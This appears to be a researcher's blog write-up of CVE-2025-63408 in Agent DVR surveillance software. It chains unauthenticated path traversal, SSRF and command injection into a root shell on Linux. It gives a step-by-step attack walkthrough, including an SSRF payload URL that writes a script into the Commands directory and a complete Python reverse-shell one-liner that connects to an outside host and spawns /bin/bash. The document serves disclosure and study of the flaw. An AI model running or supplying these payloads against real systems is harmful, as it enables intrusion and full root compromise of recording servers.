Description:

Ref: https://www.ericholub.com/blog/agent-dvr-rce/

Agent DVR is surveillance recording software from iSpyConnect. Versions ≤ 6.6.7.0 are vulnerable to local path traversal, SSRF, and command injection (on Linux), which when combined lead to authenticated RCE. These findings have all been combined into CVE-2025-63408.

Walkthrough:

Agent DVR has a local API where you can access things like recordings without any kind of authentication. Here’s the API docs for it:

[

Swagger UI

https://ispysoftware.github.io/Agent_API/#/

](https://ispysoftware.github.io/Agent_API/#/)

One call in particular is interesting, which is ‘addrecording’. This lets you assign a ‘recording’ to a particular camera.

Turns out this call is vulnerable to path traversal. I’ve already written some exploit code on how to get any file from the filesystem from this:

https://github.com/eric-m-holub/double-agent

This vulnerability can be chained with SSRF and command injection vulnerabilities for full RCE. I’m going to be attacking Agent DVR v6.6.1.0 running on Ubuntu (Linux). I tested these vulns on Windows against the same Agent DVR version and found it was vulnerable to everything but the command injection.

First off, add a new Network IP Camera.

Next select the gear icon to update the Source Type:

Now enter in the following payload for ‘Live URL’:

💲

http://127.0.0.1:8090/command/addrecording?oid=1&ot=2&path=/etc/passwd&name=../../../../Commands/rce.sh

Press ‘OK’ and then flip the camera on and off:

This leverages an SSRF vulnerability which calls this local API and creates a file called ‘rce.sh’ in the ‘Commands’ directory of Agent DVR using directory traversal. It doesn’t matter what the file contents are, only the file extension type.

Now create a new Action and Task for this camera:

Now on the popup to create a task select “Execute Command” and select the created ‘rce’ file:

For the ‘Parameters’ input, this is where you put your system command. Yes, this parameter is vulnerable to command injection, but only when you target a bash script. I had trouble with bash reverse shells, but Python works OK. Here’s that payload:

`python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'`

At this point, I’d suggest updating your new camera to something with an ‘Image’ source so we can make a new recording from it:

You can put any Image URL you want in there

So now start a listener on the port you specified in your payload, and then create a new recording on this new camera and you should get a root shell:

Tah dah. Agent DVR runs as root by default on Linux, so no privilege escalation is necessary. Have a good day.